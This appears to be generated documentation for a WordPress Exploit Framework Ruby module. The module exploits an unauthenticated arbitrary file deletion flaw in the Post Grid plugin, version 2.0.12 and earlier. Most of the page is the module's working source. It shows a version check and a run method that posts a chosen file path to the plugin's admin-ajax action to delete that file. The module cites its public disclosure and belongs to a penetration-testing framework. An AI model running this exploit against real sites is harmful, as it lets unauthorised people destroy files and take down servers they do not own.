class Wpxf::Auxiliary::PostGridFileDeletion

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 6
def initialize
  super

  update_info(
    name: 'Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion',
    desc: 'This module exploits a vulnerability in versions <= 2.0.12 of '\
          'the Post Grid plugin which allows you to delete any arbitrary '\
          'file accessible by the user the web server is running as.',
    author: [
      'White Fir Design', # Disclosure
      'rastating'         # WPXF module
    ],
    references: [
      ['WPVDB', '8667'],
      ['URL', 'https://www.pluginvulnerabilities.com/2016/11/08/file-deletion-vulnerability-in-post-grid/']
    ],
    date: 'Nov 08 2016'
  )

  register_options([
    StringOption.new(
      name: 'remote_file',
      desc: 'The relative or absolute path of the file to delete (relative to /wp-admin/)',
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 34
def check
  check_plugin_version_from_readme('post-grid', '2.0.13')
end
remote_file() click to toggle source
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 38
def remote_file
  normalized_option_value('remote_file')
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 42
def run
  return false unless super

  emit_info "Deleting #{remote_file}..."
  res = execute_post_request(
    url: wordpress_url_admin_ajax,
    body: {
      action: 'post_grid_ajax_remove_export_content_layout',
      file_url: remote_file
    }
  )

  if res.nil? || res.timed_out?
    emit_error 'Request timed out'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success 'File deleted'
  true
end